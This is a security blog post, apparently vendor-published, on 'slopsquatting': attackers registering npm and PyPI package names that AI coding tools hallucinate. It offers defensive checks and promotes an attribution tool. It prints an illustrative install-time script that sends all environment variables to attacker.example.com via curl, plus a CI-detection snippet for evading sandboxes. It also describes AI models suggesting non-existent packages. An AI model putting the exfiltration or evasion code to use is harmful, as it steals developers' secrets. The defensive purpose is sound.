Security · March 29, 2026 · 7 min read

AI Tools Hallucinate Package Names. Attackers Are Registering Them.

LLMs suggest non-existent npm/PyPI packages in roughly 5–20% of coding tasks, and attackers register those names with malicious payloads. Slopsquatting is the newest supply chain attack, and with 51% of commits now AI-assisted, the attack surface is enormous.

Published by GitIntel Research

TL;DR

Socket Security, which monitors npm and PyPI for malicious packages, reported in 2024 that it was tracking a growing cluster of registrations matching patterns consistent with LLM hallucination output — package names that didn't follow conventional naming patterns but appeared plausible as AI-generated suggestions. The security firm coined "slopsquatting" to describe the attack class.

The Scale Problem: 51% AI-Assisted Commits

What makes slopsquatting dangerous right now is the collision of two trends: AI tool adoption has reached a point where it's mainstream, but developer habits haven't fully adjusted to AI's failure modes.

| Metric | Figure |
| --- | --- |
| AI-assisted GitHub commits (2026) | ~51% |
| Developers using AI tools daily | 73% |
| Python hallucination rate (controlled study, 2025) | ~20% of tasks |
| Packages on PyPI (March 2026) | 590K+ |
| Packages on npm (March 2026) | 2.9M+ |
| Average new malicious packages/week (npm + PyPI, 2025) | ~500+ |

The combination is straightforward: 73% of developers use AI tools daily, and even a conservative 5% hallucination rate on package suggestions produces millions of hallucinated import suggestions per day across the global developer base. The namespace exposure is enormous.

Attackers don't need to be sophisticated. Registering a PyPI package takes under five minutes and is free. Monitoring AI output for hallucinated names is automatable. The asymmetry favors the attacker.
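How cheap is the reconnaissance side? Checking whether a suggested name is actually registered on PyPI takes a single request to its public JSON API. A minimal sketch (the classification helper and function names are illustrative, not from any real tool):

```python
import json
import urllib.error
import urllib.request

PYPI_JSON = "https://pypi.org/pypi/{name}/json"  # PyPI's public JSON API


def classify(status: int) -> str:
    """Map an HTTP status from the PyPI JSON API to a registration state."""
    if status == 200:
        return "registered"
    if status == 404:
        return "unregistered"  # squattable: exactly what an attacker harvests
    return "unknown"


def check_pypi(name: str) -> str:
    """Return 'registered', 'unregistered', or 'unknown' for a package name."""
    try:
        with urllib.request.urlopen(PYPI_JSON.format(name=name), timeout=5) as r:
            return classify(r.status)
    except urllib.error.HTTPError as e:
        return classify(e.code)
    except OSError:
        return "unknown"
```

The same one-request check works defensively: run it over every import an AI assistant suggests before you install anything.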

Why Your CI Pipeline Won't Catch This

The slopsquatting attack is specifically designed to evade the tooling most teams already have. Here's why each layer fails:

Dependency scanners (Snyk, Dependabot, GitHub security alerts)

These tools check packages against known vulnerability databases. A newly registered malicious package has no CVEs. It will pass every automated scanner clean until someone reports it — which happens after the damage is done.

Lock files (package-lock.json, poetry.lock)

Lock files pin exact versions — but only after a successful install. If the attacker's package is already registered when the developer first runs pip install, the malicious version gets pinned and committed.

Code review

Reviewers see a new dependency added to requirements.txt. Unless they specifically audit every new package name against PyPI and check the package's history, creation date, and author, there's no visible red flag.

AI code review tools (CodeRabbit, Copilot PR review)

These tools check code logic, not package provenance. An AI reviewing AI-generated code that added an AI-hallucinated package is unlikely to flag it. There's no provenance layer in the toolchain.

# What a malicious package install.py looks like
# (this is what runs at pip install time via setup.py)

import subprocess, os, socket, base64

def _exfil():
    hostname = socket.gethostname()
    env_data = base64.b64encode(
        str(dict(os.environ)).encode()
    ).decode()
    try:
        subprocess.run([
            "curl", "-s", "-X", "POST",
            "https://attacker.example.com/collect",
            "-d", f"h={hostname}&d={env_data}"
        ], timeout=3)
    except Exception:
        pass

_exfil()  # Runs at install time, before any import

Simplified illustration of install-time exfiltration. Real attacks are often more subtle — they delay execution, check for CI environments to avoid detection, or persist as legitimate-looking utilities.
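The CI-detection trick mentioned above is only a few lines. A hypothetical sketch (the environment variable names are common CI defaults, not taken from any specific malware sample):

```python
import os

# Environment variables commonly set by CI systems; real payloads check many more.
_CI_VARS = ("CI", "GITHUB_ACTIONS", "GITLAB_CI", "JENKINS_URL", "BUILDKITE")


def running_in_ci(env=None) -> bool:
    """Heuristic used by evasive payloads: stay dormant inside CI sandboxes."""
    env = os.environ if env is None else env
    return any(v in env for v in _CI_VARS)

# An evasive payload might gate itself like: if not running_in_ci(): _exfil()
```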

The Fix Starts in Git

The core problem is attribution. When an AI tool suggests a dependency, there's no record in git that the suggestion came from an AI. The developer commits the change, CI runs green, the package ships. The only way to audit this retroactively is to know which commits were AI-assisted.

That's not a hypothetical future requirement — it's a concrete reason why AI attribution in git matters for supply chain security, not just compliance.

Three-layer defense for AI-assisted dependency management:

  1. Attribution at commit time. If your team uses Claude Code, Copilot, or Cursor, enforce Co-Authored-By trailers. This lets you run targeted package audits on commits where AI was involved — specifically checking any dependency changes in those commits.
  2. Package age verification. Any new dependency added to your project should have a minimum age on its registry (e.g., 30 days). Packages registered last week and added today warrant scrutiny. This is automatable in CI.
  3. Verify before you install. When an AI tool suggests a new import you haven't used before, check the registry directly: pip index versions package-name or npm view package-name. Look at the author, creation date, and download count. 40 downloads and registered last month is a red flag.
# Quick audit: scan requirements.txt against known-vulnerability databases
# (note: pip-audit flags known-bad packages, not newly registered ones)

pip install pip-audit
pip-audit --requirement requirements.txt

# Check a specific package's registry metadata (author, upload time)
curl -s https://pypi.org/pypi/PACKAGE_NAME/json \
| jq '.info.author, .urls[0].upload_time'
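The 30-day age gate from step 2 can be expressed in a few lines of Python. This sketch operates on the parsed response from PyPI's /pypi/&lt;name&gt;/json endpoint (the upload_time_iso_8601 field is part of that API; the 30-day threshold is an illustrative policy value):

```python
from datetime import datetime, timezone

MIN_AGE_DAYS = 30  # policy threshold; tune per team


def package_age_days(meta: dict, now=None) -> float:
    """Age in days of the current release, from PyPI /pypi/<name>/json metadata.

    Reads urls[0]['upload_time_iso_8601'], e.g. '2026-02-01T00:00:00Z'.
    """
    uploaded = datetime.fromisoformat(
        meta["urls"][0]["upload_time_iso_8601"].replace("Z", "+00:00")
    )
    now = now or datetime.now(timezone.utc)
    return (now - uploaded).total_seconds() / 86400


def too_new(meta: dict, now=None) -> bool:
    """CI gate: fail the build when a dependency is younger than the threshold."""
    return package_age_days(meta, now) < MIN_AGE_DAYS
```

Wired into CI, this turns "packages registered last week warrant scrutiny" from a review guideline into an automatic check.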

This Is Bigger Than One Attack Vector

Slopsquatting is a specific attack, but it points to a systemic gap: our software supply chain infrastructure was built for a world where developers chose their own dependencies. It has no layer for verifying that the suggestion came from a source that might hallucinate.

The npm and PyPI namespaces are effectively open-registration with no cost. Bad actors have always exploited this — typosquatting attacks predated LLMs by a decade. But slopsquatting scales the attack in a qualitatively different way: instead of guessing what humans will mistype, attackers can harvest the predictable outputs of LLMs running on millions of developer machines simultaneously.

The asymmetry problem

Attacker cost: minutes and $0 per package name, with registration and monitoring both automatable. Defender cost: auditing every new dependency in every commit, indefinitely.
The only scalable defense is infrastructure that brings AI attribution into the git layer. If you know a commit was AI-assisted and it added new dependencies, you can trigger automated package provenance checks specifically for that commit. Without attribution, you're auditing everything, all the time — which means most teams audit nothing.
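That targeted-audit loop needs nothing beyond git plumbing plus a filter. A minimal, hypothetical sketch that parses git log output for Co-Authored-By trailers naming AI tools (the tool-name list and the expected log format are assumptions, not a GitIntel API):

```python
# Trailer substrings indicating common AI assistants; extend per team policy.
AI_COAUTHORS = ("claude", "copilot", "cursor")


def ai_assisted_commits(log_text: str) -> list:
    """Return hashes of commits whose Co-Authored-By trailer names an AI tool.

    Expects the output of:
      git log --format='%H%n%(trailers:key=Co-Authored-By)%n--'
    i.e. blocks of "hash, trailer lines" separated by '--' lines.
    """
    hashes = []
    for block in log_text.split("\n--\n"):
        lines = block.strip().splitlines()
        if not lines:
            continue
        sha, trailers = lines[0], "\n".join(lines[1:]).lower()
        if any(tool in trailers for tool in AI_COAUTHORS):
            hashes.append(sha)
    return hashes
```

Feed the resulting hashes into git diff to pull out dependency-file changes (requirements.txt, package.json), and only those diffs go through the package provenance check.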

What to Watch in the Next 12 Months

The EU AI Act, which begins enforcing against high-risk AI systems in August 2026, includes provisions on supply chain transparency. While it doesn't specifically address LLM-hallucinated dependencies, the "AI-generated content" disclosure requirements will push organizations toward better attribution practices across all AI-assisted work — including code.

On the registry side, PyPI's malware response team and npm security have both accelerated removal pipelines for confirmed malicious packages, but reactive removal doesn't prevent the first wave of installations. Proactive namespace protection — registering common LLM-hallucinated names as "reserved" or redirecting them to warnings — is an open governance question both registries are actively discussing.

For individual teams, the practical answer is available today: know which commits in your repo were AI-assisted, and apply additional scrutiny to dependency changes in those commits. That's not a complex workflow. It just requires the attribution data to exist in the first place.

Know what's AI-assisted in your repo

GitIntel scans your git history for AI-assisted commits — the first step toward auditing AI-suggested dependencies.

# Install
curl -fsSL https://gitintel.com/install.sh | sh

# Scan your repo — see AI commit attribution
cd your-repo
gitintel scan

View on GitHub

Open source (MIT) · Local-first · No data leaves your machine

Research published March 29, 2026. References: Socket Security (2024–2025), Sonatype State of the Software Supply Chain 2025, PyPI and npm public registry data.

